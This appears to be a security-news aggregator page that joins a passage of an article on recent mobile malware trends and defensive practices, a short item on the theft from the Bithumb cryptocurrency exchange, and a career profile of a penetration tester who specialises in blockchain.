Trend Micro reported in January that the motion-activated Anubis appeared in two seemingly legitimate apps: a battery extender app with a 4.5-star rating and a currency converter. Once activated, Anubis installed a keylogger for stealing credentials or took screenshots for the same purpose.

Preinstalled Mobile Malware

Downloading apps is one way to sneak malware onto phones. Preinstalling it is another. The technology firm Upstream discovered in January that the Alcatel smartphone models Pixi 4 and A3 Max contained malware out of the box. The malware was hidden in a preinstalled weather app called Weather Forecast-World Weather Accurate Radar. The app was also available separately on the Google Play store and was downloaded more than 10 million times. It has since been removed.

The malware collected various bits of data, such as location data, user email addresses and International Mobile Equipment Identity (IMEI) numbers and may have loaded adware. It also subscribed users to a for-pay phone number service.

Clipper Malware on Google Play

Another unwelcome trend is the appearance of older methods of compromise in legitimate app stores. For example, the first clipper malware ever discovered on the official Google Play store was found by the security company ESET in February: Android/Clipper.C. Previously, clipper malware was the exclusive province of desktop PCs or unauthorized app stores.

Clipper apps replace the clipboard contents of a device with other data. For example, a clipper app might switch the account for a deposit during a cryptocurrency transaction, redirecting the transaction to the attacker’s account.

In addition, Android/Clipper.C attempted to nab credentials and private keys and send them to the attacker’s Telegram account to steal Ethereum funds, but it could also replace either an Ethereum or a bitcoin wallet address.

Attack Campaigns on a Massive Scale

Yet another new trend is that some malware is being distributed on a massive scale. Some 150 million Android users were impacted recently by malware called SimBad. The malware disguises itself as advertising, according to Check Point, mostly inside a large number of mobile games.

In fact, SimBad carries out phishing attacks that lead users to websites where even more malware is downloaded. Once launched, SimBad is difficult to stop or uninstall. Apps containing the SimBad malware have since been removed from the store.

Distributing Malware via Image Files

Malware can even be smuggled onto a phone without apps. A new Android bug enabled a standard photo file format to serve as the vehicle for an attack. Google discovered the method, fixed it with a February patch, then described it in a security bulletin. The flaw enabled hacks of Android smartphones via PNG files by way of a purpose-built PGN that could execute code. It’s worth noting that the vast majority of Android phones are not updated frequently and did not get the patch quickly.

What Can We Do to Combat Creative New Malware Strains?

The bottom line is that mobile malware techniques to compromise security cannot be easily predicted. What can be predicted is that threats will continue to rise, new methods will continue to be devised and mobile devices will continue to be the focus of intense malware activity.

The point of all this is not to guard specifically against the examples in this article, but to understand the growing threat — and reflect on the fact that far too many organizations are unprepared. So what can they do to prepare for the unpredictable?

To get started, here are some mobile security best practices and policies to follow and enforce:

  • Keep devices current with the latest updates.

  • Stick to official and authorized app stores. While many of the threats reported here actually appeared on the official Google Play store, it’s important to note that affected apps are removed immediately once discovered. The same can’t be said for unauthorized sources for mobile apps.

  • Minimize the number of apps installed and favor reputable app developers.

  • Embrace a comprehensive approach to mobile security that can protect against even unreported or unpredicted threats.

  • Understand that some of the newest threats can only be stopped with powerful artificial intelligence-based tools.

  • Improve and enforce policies against using public WiFi and in favor of using good password management.

Nobody can predict how creative new malware methods will infiltrate the mobile devices used by employees at your organization. But it’s easy to predict that these attempts will be made. Security decision-makers can no longer think about these threats as theoretical or secondary in importance to other work. It’s time to act on what we know is coming: something unpredictable.

The post Preparing for the Unpredictable: Security in a New World of Mobile Malware appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Mike Elgan

Bithump hacked, Computer Security, Crypto Attack, cryptocurrency, Cryptocurrency hack, Cyber Attack, Maintaining Access, Uncategorized,

Bithumb Hacked – Hackers Transferred $20 Million Worth Cryptocurrencies From Bithumb Wallet

Bithumb Hacked

Bithumb Hacked 3rd time, Yes, One of the worlds largest cryptocurrency exchange Bithumb Hacked by unknown cybercriminals and stolen nearly $20 million worth cryptocurrencies from its wallet. Bithumb is a South Korean cryptocurrency exchange allegedly facing continuous cyber attacks since 2017, and this is 3 rd time in past 2 years. Bithumb detected an unauthorized […]

The post Bithumb Hacked – Hackers Transferred $20 Million Worth Cryptocurrencies From Bithumb Wallet appeared first on GBHackers On Security.

bitcoin, Blockchain, cryptocurrency, Penetration Testing, Professional Development, Security Professionals, Security Services, X-Force,

How Chris Thomas Paired His Passion for Blockchain With Pen Testing

Chris Thomas, X-Force Red’s blockchain security expert, has always had an interest in understanding how technologies are built and operated. As a young child, Chris’ father thought it would be enjoyable for the two to build a computer instead of buying a premanufactured one. After two attempts, the father-and-son duo successfully built Chris’ first computer. Little did they know the project would ignite Chris’ future career as a penetration tester.

At just 11 years old, Chris performed his first penetration test, hacking into his school’s network. The content of his school’s information technology class wasn’t challenging for Chris, giving him plenty of time to teach himself how to program and code. Using his self-taught knowledge, he was able to scan the school’s network and access window shares that allowed him to log in as a domain administrator. Because he has a strong moral compass, Chris communicated his findings with the school’s system administrator, who became a close ally and supported Chris’ work. Through this experience, Chris knew he wanted to become a penetration tester.

Starting a Career in Penetration Testing

After secondary school, Chris pursued and completed an undergraduate degree in programming and a graduate degree in cybersecurity. He then began his first full-time job working as a system administrator for a large technology company in Manchester, England. Chris’ knowledge was second to none, but his employer would not let him begin his career as a penetration tester with the company. It was not until Chris alpha tested and passed the CREST CRT exam that his company moved him to a junior penetration tester position.

Over the next 10 years, Chris excelled in his role as a penetration tester and became a principal consultant, serving as the technical lead on a project for a large financial institution. He and his team managed the company’s global penetration testing network and built the network access controls from scratch. In the midst of that project, Chris met Thomas MacKenzie, who is now X-Force Red’s associate partner in Europe, the Middle East and Africa.

Joining the X-Force Red Team

Chris has always been infatuated with blockchain technology since its inception and initial ties to cryptocurrency. With a passion for understanding how systems work and function, he immediately educated himself on all things blockchain and bitcoin and has continued researching and tinkering with the technologies ever since.

When Thomas joined X-Force Red, he contacted Chris about his interest in joining the team as well. Thomas knew Chris had a strong interest in blockchain and reminded him that IBM was one of the industry leaders in developing new blockchain technology. Thomas suggested that Chris become X-Force Red’s leading blockchain testing expert, an opportunity Chris accepted without hesitation.

In his current role, leading X-Force Red’s blockchain testing services, Chris combines his passion for penetration testing with his love for blockchain. The team works with clients to find weaknesses not only in the implementation and use of blockchain technology itself, but also in the connected infrastructure.

Alongside X-Force Red’s veteran hackers, who are also developers and engineers, Chris is excited to help shape the adoption and implementation of blockchain across various industries.

Learn more about X-Force Red Blockchain Testing

The post How Chris Thomas Paired His Passion for Blockchain With Pen Testing appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Carter Garrison